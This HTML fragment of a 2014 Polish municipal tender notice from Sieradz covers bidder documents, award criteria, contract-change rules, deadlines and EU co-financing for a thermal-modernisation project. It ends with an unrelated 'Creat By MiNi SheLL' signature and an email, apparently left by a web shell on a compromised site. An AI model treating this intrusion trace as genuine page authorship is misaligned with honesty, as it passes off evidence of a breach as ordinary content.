<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Wzór proponowanej do zawarcia umowy stanowi załącznik nr 2 do niniejszej SIWZ.
2.Strony zastrzegają możliwość dokonania w uzasadnionych okolicznościach zmian postanowień niniejszej umowy. Wszelkie zmiany treści umowy wymagają pod rygorem nieważności zachowania formy pisemnej.
3. Zamawiający przewiduje możliwość zmiany umowy, w przypadku wystąpienia okoliczności niezależnych od stron umowy:
1) w przypadku ustawowej zmiany określonej w umowie procentowej stawki podatku VAT, kwota brutto wynagrodzenia umownego zostanie odpowiednio zmieniona,
2) w przypadku zmiany albo rezygnacji z Podwykonawcy, którego Wykonawca wskazał na etapie składania oferty.
4. W przypadku konieczności zmiany wskazanych przez Wykonawcę w ofercie osób uczestniczących w wykonywaniu zamówienia, Wykonawca może dokonać zmiany w tym zakresie za zgodą Zamawiającego pod warunkiem zachowania warunków dotyczących kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia określonych w SIWZ oraz zawiadomienia Zamawiającego o powyższej zmianie z co najmniej 7 dniowym wyprzedzeniem. Zmiana w tym zakresie nie wymaga zawarcia aneksu do umowy.
5. Każda ze stron może wystąpić z propozycją zmian postanowień niniejszej umowy. Propozycja musi wskazywać na okoliczności uzasadniające wprowadzenie zmian.
6. Strony ustalają, że Wykonawca nie może bez zgody Zamawiającego dokonać cesji wierzytelności na rzecz osoby trzeciej</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.umsieradz.finn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Sieradza
plac Wojewódzki 1
98-200 Sieradz
pokój nr 28.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.09.2014 godzina 09:00, miejsce: Biuro Obsługi Klientów
Urząd Miasta Sieradza
plac Wojewódzki 1
98-200 Sieradz.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiot zamówienia jest przedsięwzięciem realizowanym przy współfinansowaniu środków Funduszu Spójności w ramach Programu Operacyjnego Infrastruktura i Środowisko 2007-2013, Priorytet IX Infrastruktura energetyczna przyjazna środowisku i efektywność energetyczna; Działanie 9.3 Termomodernizacja obiektów użyteczności publicznej - plany gospodarki niskoemisyjnej w ramach konkursu nr 2/POIiŚ/9.3/2013, ogłoszonego przez Narodowy Fundusz Ochrony Środowiska i Gospodarki Wodnej działający na podstawie Umowy z Ministrem Gospodarki jako Instytucja Wdrażająca.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com